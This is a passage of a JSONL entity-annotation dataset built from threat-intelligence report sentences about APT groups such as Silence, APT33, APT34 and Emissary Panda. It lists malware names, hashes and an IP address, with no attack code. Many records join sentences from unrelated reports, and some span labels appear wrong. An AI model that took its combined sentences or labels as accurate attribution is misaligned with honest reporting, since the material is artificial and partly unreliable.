countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Group-IB has also detected recon emails sent out to New Zealand . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .lNK shortcuts as malicious attachments .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 71, "end": 84, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 203, "end": 208, "label": "System"}, {"start": 264, "end": 273, "label": "Malware"}, {"start": 276, "end": 284, "label": "Indicator"}, {"start": 390, "end": 399, "label": "Organization"}, {"start": 457, "end": 464, "label": "Malware"}, {"start": 469, "end": 480, "label": "Malware"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 659, "end": 668, "label": "Organization"}, {"start": 846, "end": 859, "label": "Indicator"}, {"start": 935, "end": 939, "label": "Indicator"}, {"start": 942, "end": 946, "label": "Indicator"}, {"start": 953, "end": 957, "label": "Indicator"}, {"start": 996, "end": 1003, "label": "System"}, {"start": 1008, "end": 1019, "label": "System"}, {"start": 1124, "end": 1131, "label": "Malware"}, {"start": 1157, "end": 1168, "label": "Malware"}, {"start": 1196, "end": 1205, "label": "Organization"}, {"start": 1223, "end": 1232, "label": "Organization"}, {"start": 1321, "end": 1330, "label": "Organization"}, {"start": 1450, "end": 1459, "label": "Organization"}, {"start": 1532, "end": 1544, "label": "Malware"}, {"start": 1589, "end": 1594, "label": "Malware"}, {"start": 1599, "end": 1612, "label": "Malware"}, {"start": 1630, "end": 1637, "label": "Organization"}, {"start": 1638, "end": 1644, "label": "Malware"}, {"start": 1700, "end": 1711, "label": "Organization"}, {"start": 1771, "end": 1777, "label": "System"}, {"start": 1886, "end": 1895, "label": "Organization"}, {"start": 2091, "end": 2100, "label": "Organization"}, {"start": 2136, "end": 2142, "label": "System"}, {"start": 2232, "end": 2238, "label": "System"}, {"start": 2335, "end": 2341, "label": "System"}, {"start": 2405, "end": 2414, "label": "Organization"}, {"start": 2470, "end": 2481, "label": "Organization"}, {"start": 2486, "end": 2504, "label": "Organization"}, {"start": 2507, "end": 2520, "label": "Organization"}, {"start": 2533, "end": 2546, "label": "Organization"}, {"start": 2590, "end": 2600, "label": "Malware"}, {"start": 2605, "end": 2615, "label": "Malware"}, {"start": 2675, "end": 2682, "label": "Malware"}, {"start": 2687, "end": 2698, "label": "Malware"}, {"start": 2731, "end": 2741, "label": "Malware"}, {"start": 2746, "end": 2756, "label": "Malware"}, {"start": 2773, "end": 2782, "label": "Organization"}, {"start": 2876, "end": 2885, "label": "Organization"}, {"start": 3179, "end": 3184, "label": "System"}, {"start": 3239, "end": 3248, "label": "Organization"}, {"start": 3332, "end": 3342, "label": "Malware"}, {"start": 3347, "end": 3362, "label": "Malware"}, {"start": 3485, "end": 3490, "label": "System"}, {"start": 3557, "end": 3566, "label": "Organization"}, {"start": 3811, "end": 3820, "label": "Organization"}, {"start": 3917, "end": 3922, "label": "System"}, {"start": 3982, "end": 3991, "label": "Organization"}, {"start": 4015, "end": 4024, "label": "Organization"}, {"start": 4117, "end": 4122, "label": "Organization"}, {"start": 4125, "end": 4138, "label": "Organization"}, {"start": 4143, "end": 4155, "label": "Organization"}, {"start": 4191, "end": 4200, "label": "Organization"}, {"start": 4225, "end": 4230, "label": "System"}, {"start": 4270, "end": 4274, "label": "System"}, {"start": 4321, "end": 4331, "label": "Organization"}, {"start": 4379, "end": 4388, "label": "Organization"}, {"start": 4434, "end": 4443, "label": "Organization"}, {"start": 4508, "end": 4517, "label": "Organization"}, {"start": 4565, "end": 4574, "label": "Organization"}, {"start": 4658, "end": 4667, "label": "Organization"}, {"start": 4772, "end": 4781, "label": "Organization"}, {"start": 4784, "end": 4796, "label": "Organization"}, {"start": 4799, "end": 4810, "label": "Organization"}, {"start": 4815, "end": 4829, "label": "Organization"}, {"start": 4869, "end": 4878, "label": "Organization"}, {"start": 5090, "end": 5096, "label": "System"}, {"start": 5107, "end": 5112, "label": "System"}, {"start": 5264, "end": 5270, "label": "Organization"}, {"start": 5383, "end": 5390, "label": "Organization"}, {"start": 5445, "end": 5454, "label": "Organization"}, {"start": 5504, "end": 5512, "label": "Organization"}, {"start": 5637, "end": 5647, "label": "Organization"}, {"start": 5665, "end": 5672, "label": "Organization"}, {"start": 5801, "end": 5808, "label": "Organization"}, {"start": 5828, "end": 5833, "label": "Malware"}, {"start": 5860, "end": 5869, "label": "Malware"}, {"start": 5888, "end": 5898, "label": "System"}, {"start": 5914, "end": 5926, "label": "Organization"}, {"start": 6117, "end": 6135, "label": "Organization"}, {"start": 6185, "end": 6195, "label": "Organization"}, {"start": 6257, "end": 6262, "label": "Organization"}, {"start": 6275, "end": 6282, "label": "Organization"}, {"start": 6319, "end": 6326, "label": "Organization"}, {"start": 6580, "end": 6590, "label": "Organization"}, {"start": 6820, "end": 6827, "label": "Organization"}, {"start": 6944, "end": 6951, "label": "Organization"}, {"start": 6952, "end": 6958, "label": "System"}, {"start": 7005, "end": 7022, "label": "Indicator"}, {"start": 7087, "end": 7092, "label": "Organization"}, {"start": 7095, "end": 7102, "label": "Organization"}, {"start": 7154, "end": 7160, "label": "System"}, {"start": 7226, "end": 7234, "label": "Organization"}, {"start": 7253, "end": 7265, "label": "Indicator"}, {"start": 7323, "end": 7330, "label": "Organization"}, {"start": 7370, "end": 7376, "label": "System"}, {"start": 7380, "end": 7385, "label": "Organization"}, {"start": 7461, "end": 7468, "label": "Organization"}, {"start": 7503, "end": 7515, "label": "Organization"}, {"start": 7565, "end": 7572, "label": "Organization"}, {"start": 7597, "end": 7603, "label": "System"}, {"start": 7720, "end": 7730, "label": "Organization"}, {"start": 7774, "end": 7783, "label": "Organization"}, {"start": 7991, "end": 7998, "label": "Organization"}, {"start": 8023, "end": 8029, "label": "System"}, {"start": 8119, "end": 8126, "label": "Organization"}, {"start": 8138, "end": 8147, "label": "Organization"}, {"start": 8207, "end": 8211, "label": "Indicator"}]}
{"text": "FireEye believes the Ke3chang attackers likely began attempting to exfiltrate sensitive data shortly thereafter . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 21, "end": 29, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 160, "end": 165, "label": "Organization"}]}
{"text": "This report details some of the technical findings of the Lazarus Group\u2019s malware , observed by Novetta during Operation Blockbuster . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": [{"start": 58, "end": 65, "label": "Organization"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 111, "end": 132, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 194, "end": 204, "label": "System"}, {"start": 219, "end": 224, "label": "Indicator"}]}
{"text": "The Lazarus Group was first identified in Novetta\u2019s report Operation Blockbuster in February 2016 . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 104, "end": 123, "label": "Indicator"}]}
{"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT . As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 27, "end": 32, "label": "Organization"}, {"start": 39, "end": 49, "label": "System"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 104, "end": 112, "label": "System"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 147, "end": 159, "label": "Malware"}, {"start": 168, "end": 175, "label": "System"}]}
{"text": "In 2018 , Kaspersky Labs published a report that analyzed Turla threat group . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and SilenceProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 116, "end": 133, "label": "Malware"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 259, "end": 275, "label": "Malware"}, {"start": 280, "end": 299, "label": "Malware"}]}
{"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 95, "end": 107, "label": "Organization"}, {"start": 118, "end": 144, "label": "Organization"}, {"start": 226, "end": 232, "label": "System"}, {"start": 275, "end": 282, "label": "Vulnerability"}, {"start": 291, "end": 305, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}]}
{"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled \u0414\u043e\u0433\u043e\u0432\u043e\u0440.doc\u201d [Contract.doc] .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 128, "end": 135, "label": "System"}, {"start": 168, "end": 180, "label": "Malware"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 233, "end": 239, "label": "System"}, {"start": 253, "end": 308, "label": "Indicator"}, {"start": 309, "end": 323, "label": "Indicator"}]}
{"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group . Silence sent out emails to Russian banks .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 76, "end": 81, "label": "Organization"}, {"start": 90, "end": 97, "label": "Organization"}, {"start": 107, "end": 113, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}]}
{"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti . The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 58, "label": "Organization"}, {"start": 95, "end": 110, "label": "System"}, {"start": 117, "end": 124, "label": "Vulnerability"}, {"start": 134, "end": 143, "label": "Organization"}]}
{"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 180, "end": 192, "label": "Organization"}]}
{"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware . Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence\u2019s Trojan , known as Silence.MainModule .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 20, "end": 27, "label": "Organization"}, {"start": 133, "end": 142, "label": "System"}, {"start": 164, "end": 172, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 285, "end": 291, "label": "Malware"}, {"start": 303, "end": 321, "label": "Malware"}]}
{"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . On 24 March 2019 , Silence.ProxyBot MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": [{"start": 9, "end": 16, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 165, "end": 172, "label": "Organization"}, {"start": 416, "end": 425, "label": "Organization"}, {"start": 511, "end": 516, "label": "Organization"}, {"start": 538, "end": 554, "label": "Malware"}, {"start": 559, "end": 591, "label": "Indicator"}, {"start": 610, "end": 620, "label": "System"}, {"start": 629, "end": 631, "label": "Indicator"}, {"start": 699, "end": 705, "label": "System"}, {"start": 717, "end": 726, "label": "Organization"}, {"start": 777, "end": 785, "label": "Organization"}, {"start": 931, "end": 938, "label": "Organization"}, {"start": 988, "end": 992, "label": "Organization"}, {"start": 1075, "end": 1085, "label": "Malware"}, {"start": 1090, "end": 1096, "label": "Malware"}, {"start": 1110, "end": 1117, "label": "Organization"}, {"start": 1183, "end": 1195, "label": "Indicator"}, {"start": 1250, "end": 1254, "label": "Organization"}, {"start": 1276, "end": 1284, "label": "Organization"}, {"start": 1319, "end": 1326, "label": "Organization"}, {"start": 1511, "end": 1518, "label": "Organization"}, {"start": 1537, "end": 1543, "label": "System"}, {"start": 1617, "end": 1626, "label": "Organization"}]}
{"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.exe with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Since at least 2011 , these hackers have been using malware to spy on corporate networks . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . The hackers will map a company\u2019s network and look for strategically favorable locations for placing their malware . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.\u201d Henkel claims that a very small portion\u201d of its worldwide IT systems had been aected \u2014 the systems in Germany . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels\u201d of defense . The tool was written by sta of Thyssenkrupp , because the industrial giant\u2014company number eleven\u2014had been spied on by Winnti . Hackers are charged with spying on a manufacturer of gas turbines . The Hong Kong government was spied on by the Winnti hackers . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . NewsBeef attacks against Saudi Arabian organizations and individuals are likely to continue . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . These RAT families are discussed in Novetta\u2019s other report on the Lazarus Group\u2019s RAT and Staging capabilities . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations . \bCTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East , as well as across Europe and in the United States . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The samples we analyzed originated from the Philippines . APT10 frequently targets the Southeast Asia region . Both of the loader\u2019s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures and code associated with APT10 . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file\u2019s compilation date . Over the past three months , Recorded Future\u2019s Insikt Group has observed an increase in APT33\u2019s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous expos\u00e9s of their activity . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese Cyber Espionage group . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . Symantec\u2019s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . FireEye also noted in their 2017 report that the online handle xman_1365_x , \u201d found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . Recorded Future\u2019s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33\u2019s domain and hosting infrastructure in an effort to identify recent activity . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . While we haven\u2019t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . On June 19 , 2019 , FireEye\u2019s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . A backdoor that communicates with a single command and control server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . FireEye\u2019s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike \u2013 a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors \u2013 which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . However , this action doesn\u2019t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . Bitdefender\u2019s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank\u2019s employees . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Bitdefender\u2019s investigation shows the attackers\u2019 main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee\u2019s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . we will provide an analysis of the HyperBro tool in an upcoming section . However , using NCC Group\u2019s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 ) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 91, "end": 102, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}, {"start": 180, "end": 185, "label": "System"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 252, "end": 258, "label": "System"}, {"start": 278, "end": 296, "label": "Indicator"}, {"start": 366, "end": 384, "label": "Indicator"}, {"start": 413, "end": 419, "label": "Malware"}, {"start": 462, "end": 469, "label": "Indicator"}, {"start": 653, "end": 660, "label": "Malware"}, {"start": 692, "end": 699, "label": "Organization"}, {"start": 714, "end": 733, "label": "Organization"}, {"start": 745, "end": 753, "label": "Organization"}, {"start": 758, "end": 772, "label": "Organization"}, {"start": 928, "end": 934, "label": "Organization"}, {"start": 1232, "end": 1237, "label": "System"}, {"start": 1352, "end": 1364, "label": "Malware"}, {"start": 1439, "end": 1445, "label": "Organization"}, {"start": 1448, "end": 1455, "label": "Organization"}, {"start": 1485, "end": 1497, "label": "Organization"}, {"start": 1561, "end": 1567, "label": "Organization"}, {"start": 1578, "end": 1585, "label": "Malware"}, {"start": 1622, "end": 1627, "label": "Organization"}, {"start": 1705, "end": 1716, "label": "Organization"}, {"start": 1869, "end": 1888, "label": "Organization"}, {"start": 1891, "end": 1900, "label": "Organization"}, {"start": 1907, "end": 1917, "label": "Organization"}, {"start": 1941, "end": 1949, "label": "Organization"}, {"start": 2035, "end": 2041, "label": "Organization"}, {"start": 2094, "end": 2101, "label": "System"}, {"start": 2132, "end": 2137, "label": "Organization"}, {"start": 2241, "end": 2247, "label": "Organization"}, {"start": 2263, "end": 2268, "label": "Organization"}, {"start": 2293, "end": 2305, "label": "Indicator"}, {"start": 2344, "end": 2353, "label": "Organization"}, {"start": 2374, "end": 2381, "label": "Organization"}, {"start": 2421, "end": 2433, "label": "Organization"}, {"start": 2478, "end": 2484, "label": "Organization"}, {"start": 2487, "end": 2497, "label": "Organization"}, {"start": 2504, "end": 2514, "label": "Organization"}, {"start": 2643, "end": 2650, "label": "Organization"}, {"start": 2661, "end": 2666, "label": "Organization"}, {"start": 2739, "end": 2746, "label": "Organization"}, {"start": 2749, "end": 2758, "label": "Organization"}, {"start": 2763, "end": 2776, "label": "Organization"}, {"start": 2793, "end": 2797, "label": "Organization"}, {"start": 2972, "end": 2979, "label": "Organization"}, {"start": 2982, "end": 2986, "label": "Organization"}, {"start": 3013, "end": 3025, "label": "Organization"}, {"start": 3232, "end": 3243, "label": "Organization"}, {"start": 3362, "end": 3369, "label": "Indicator"}, {"start": 3446, "end": 3456, "label": "Organization"}, {"start": 3461, "end": 3468, "label": "Organization"}, {"start": 3469, "end": 3482, "label": "Organization"}, {"start": 3542, "end": 3547, "label": "Organization"}, {"start": 3574, "end": 3581, "label": "Indicator"}, {"start": 3628, "end": 3633, "label": "Organization"}, {"start": 3743, "end": 3749, "label": "Organization"}, {"start": 3836, "end": 3841, "label": "Organization"}, {"start": 3856, "end": 3861, "label": "Organization"}, {"start": 4033, "end": 4039, "label": "Indicator"}, {"start": 4148, "end": 4165, "label": "Organization"}, {"start": 4207, "end": 4214, "label": "Organization"}, {"start": 4229, "end": 4234, "label": "Organization"}, {"start": 4339, "end": 4349, "label": "Organization"}, {"start": 4443, "end": 4448, "label": "Organization"}, {"start": 4709, "end": 4714, "label": "Organization"}, {"start": 5239, "end": 5244, "label": "Organization"}, {"start": 5309, "end": 5314, 